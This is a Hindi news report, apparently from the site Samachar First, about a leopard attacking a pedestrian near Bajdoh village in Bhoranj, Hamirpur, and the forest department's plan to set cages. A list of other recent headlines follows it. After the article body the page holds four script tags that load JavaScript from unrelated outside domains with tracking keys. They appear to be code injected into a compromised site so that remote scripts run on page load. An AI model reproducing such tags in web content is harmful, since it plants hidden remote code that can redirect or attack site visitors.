हमीरपुरः भोरंज में बजडोह गांव में तेंदुए ने राहगीर पर किया हमला

<p>जिला हमीरपुर के उपमंडल भोरंज के विभिन्न गांवो में तेंदुओं के हमले दिन प्रतिदिन बढ़ते ही जा रहे हैं। ऐसे तो तेंदुआ पालतू कुत्तों या पालतू जानवरों को ही अपना शिकार बना रहा था लेकिन अब यह तेंदुए लोगों पर भी हमला कर रहे हैं। अब एक मामला उपमंडल भोरंज के में देखने को मिला है। यहां बजडोह गांव के जंगल के साथ लगती सड़क पर तेंदुए ने एक राहगीर मनोज कुमार पुत्र हरि दास गांव बधानी के ऊपर हमला कर दिया।</p>

<p>मनोज कुमार बजे अपने बेटे के साथ अपने ससुराल पैदल जा रहा था। उस समय सड़क के किनारे बैठे हुए तेंदुए ने मनोज कुमार के ऊपर हमला बोल दिया। जिसमें मनोज कुमार के कपडे फट गए और टांग पर गहरा घाव कर दिया। मनोज कुमार ने हिम्मत जुटाते हुए तेंदुए को धक्का मार कर अपने से दूर कर दिया। उसके बाद तेंदुआ वहां से भाग खड़ा हुआ। इससे पहले भी एक बाइक सवार पर इस तेंदुए ने हमला किया था। ग्राम पंचायत बधानी के उप प्रधान विनोद कुमार ने विभाग को इसके बारे में सूचित कर दिया है। विभाग से उचित कार्रवाई करने की मांग की है ताकि भविष्य में कोई जानी नुकसान न हो।</p>

<p>उधर, इस संदर्भ में भोरंज वन विभाग के बीओ जगत राम ने बताया कि टीम को मौके पर भेजा गया है। मामले की तफ्तीश की जा रही है। एक दो दिन में यहां पर तेंदुए को पकड़ने के लिए पिंजरा लगाया जाएगा। दूसरी जगहों पर भी पिंजरे लगाए गए हैं लेकिन अभी कोई तेंदुआ पकड़ में नहीं आया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1601726620360″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Kangra News: टुल्लू पंप से करंट लगने से पूर्व सैनिक की मौत

Tragic accident: कांगड़ा के विकास खंड लंबागांव की तलवाड़ पंचायत के कुटबला (सुगड़ीबाग) गांव में…

3 mins ago

दीवाली से पहले डीए और एरियर पर निर्णय! 22 को कैबिनेट संभावित

HimachalGovernmentUpdates: मुख्यमंत्री सुखविंदर सिंह सुक्खू की अध्यक्षता में 22 अक्तूबर को मंत्रिमंडल की बैठक संभावित…

32 mins ago

शिमला में 11 अक्तूबर और 2 नवंबर को रहेगी छुट्टी

Shimla local holiday: राजधानी शिमला में 11 अक्तूबर 2024 शुक्रवार और 2 नवंबर 2024 शनिवार…

1 hour ago

आज का राशिफल

आज का राशिफल (09 अक्टूबर 2024, बुधवार) मेष 🐐 आज आपका दिन सामान्य रहेगा। किसी…

1 hour ago

विधायकों की खरीद-फरोख्त मामला: हेलिकॉप्टर कंपनी के अधिकारी से शिमला में पूछताछ

MLABriberyCase: विधायकों की खरीद-फरोख्त और सरकार को अस्थिर करने के मामले में जांच के तहत…

12 hours ago

हरियाणा में बीजेपी तीसरी बार, जम्मू-कश्मीर में NC-कांग्रेस की सरकार

Elections2024: हरियाणा में भाजपा कांग्रेस के मुंह से जीत छीनकर लगातार तीसरी बार सरकार बनाने…

12 hours ago